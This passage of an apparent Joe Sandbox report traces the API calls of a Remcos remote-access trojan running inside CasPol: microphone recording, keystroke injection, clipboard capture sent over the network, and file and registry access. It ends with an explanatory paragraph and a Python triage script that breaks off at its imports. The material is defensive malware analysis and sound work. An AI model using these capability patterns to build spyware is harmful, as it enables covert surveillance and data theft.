• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
• API String ID: 3809562944-3643129801
• Opcode ID: 126357b6d54d8c6b8d9661e07f6eaafbb2250238a1c2482dec3260737e9f4809
• Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
• Opcode Fuzzy Hash: 126357b6d54d8c6b8d9661e07f6eaafbb2250238a1c2482dec3260737e9f4809
• Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G
• API String ID: 1356121797-903574159
• Opcode ID: 26fe90a91a06c390124097d879efed6aeabfafde605fe0cb44867ace1fe750fb
• Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
• Opcode Fuzzy Hash: 26fe90a91a06c390124097d879efed6aeabfafde605fe0cb44867ace1fe750fb
• Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• TranslateMessage.USER32(?), ref: 0041C9FB
• DispatchMessageA.USER32(?), ref: 0041CA05
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
• Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
• Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
• Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
• Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
• __alloca_probe_16.LIBCMT ref: 00452C91
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
• __alloca_probe_16.LIBCMT ref: 00452D3B
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
• __freea.LIBCMT ref: 00452DAA
• __freea.LIBCMT ref: 00452DB6
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID:
• API String ID: 201697637-0
• Opcode ID: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
• Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
• Opcode Fuzzy Hash: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
• Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable_wcschr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 487594629-0
                                                                                                                                                                                                                                  • Opcode ID: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                  • Instruction ID: 24f0059e533d9f3fb59acd5008695e198d0c5eb1710b72595803e493e6dfdcaf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0616975904351ABD710DF78CC81A5EB7E4EF09760F5A426DF9419F2C1EA32E9818B90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D1B
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 04571D37
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D4B
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D58
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D72
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D7D
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D8A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1454806937-0
                                                                                                                                                                                                                                  • Opcode ID: 8fabf9394096bb04337fbd22e37506ad8c371af595785d63fd4f5eaa012ad523
                                                                                                                                                                                                                                  • Instruction ID: 5b110631bde36cff5e767a99cb9c84bee5f03a4e5a77b9237b2537033a0646bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fabf9394096bb04337fbd22e37506ad8c371af595785d63fd4f5eaa012ad523
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A21FF7194121DBFEB109BA0BC8CEEA76BCFF58354F000975F515E2140E674AE49AB70
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444714
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044472D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044475F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444768
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444774
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                                                                                                                                                  • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: tcp$udp
                                                                                                                                                                                                                                  • API String ID: 0-3725065008
                                                                                                                                                                                                                                  • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                                  • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                                                    • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                                                                                    • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: T=G$p[G$>G$>G
• API String ID: 1596592924-2461731529
• Opcode ID: 41ebb40f2f1bfb1a23cd17121feee99ae440847be78400a274949e541b1a8e90
• Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
• Opcode Fuzzy Hash: 41ebb40f2f1bfb1a23cd17121feee99ae440847be78400a274949e541b1a8e90
• Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: 05410319be8a459ab309e5df5f3f26762275024d1115655ea8af3afe082379bf
• Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
• Opcode Fuzzy Hash: 05410319be8a459ab309e5df5f3f26762275024d1115655ea8af3afe082379bf
• Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
• _wcslen.LIBCMT ref: 0041A8F6
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
• String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 3286818993-703403762
• Opcode ID: 8a6c4d698cc58011d67a224944d997277571159de44189b964043ef0793dda29
• Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
• Opcode Fuzzy Hash: 8a6c4d698cc58011d67a224944d997277571159de44189b964043ef0793dda29
• Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
APIs
• AllocConsole.KERNEL32(00474358), ref: 0041BEB9
• GetConsoleWindow.KERNEL32 ref: 0041BEBF
• ShowWindow.USER32(00000000,00000000), ref: 0041BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 4067487056-2527699604
• Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
• Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
• __alloca_probe_16.LIBCMT ref: 004499E2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
• __alloca_probe_16.LIBCMT ref: 00449AC7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
• __freea.LIBCMT ref: 00449B37
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
• __freea.LIBCMT ref: 00449B40
• __freea.LIBCMT ref: 00449B65
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
• Opcode ID: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
• Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
• Opcode Fuzzy Hash: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
• Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
APIs
• SendInput.USER32 ref: 00418B08
• SendInput.USER32(00000001,?,0000001C), ref: 00418B30
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
• SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InputSend$Virtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1167301434-0
                                                                                                                                                                                                                                  • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                  • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2172192267-0
                                                                                                                                                                                                                                  • Opcode ID: 2c62b29cbb0c0b726e66b0f18e316f3817271852f488f8e8f00663a8e1569e3c
                                                                                                                                                                                                                                  • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c62b29cbb0c0b726e66b0f18e316f3817271852f488f8e8f00663a8e1569e3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
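The two function entries above are the kind of capability cluster a triage analyst wants surfaced automatically rather than found by scrolling: the first synthesizes keystrokes (SendInput with a MapVirtualKeyA subcall), the second opens the clipboard, reads format 0x0D (CF_UNICODETEXT), and hands the buffer to a function that calls send over WS2_32, which is clipboard exfiltration. The script below is an added example and is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses bullet lines in the format shown on this page into per-function call sets and tags the clipboard-exfiltration and keystroke-injection patterns. The embedded report text is constructed from the entries above; the tag names, the rule logic, and the list of send-like APIs are my own assumptions.

```python
"""Triage helper: scan a Joe Sandbox 'Executed Functions' listing for capability clusters.

Added example; parses the '• Api.MODULE(args), ref: addr' bullet format shown in the
report and tags functions whose call set matches a RAT capability (clipboard exfil,
keystroke injection). Rule names and the send-like API list are assumptions.
"""
import re

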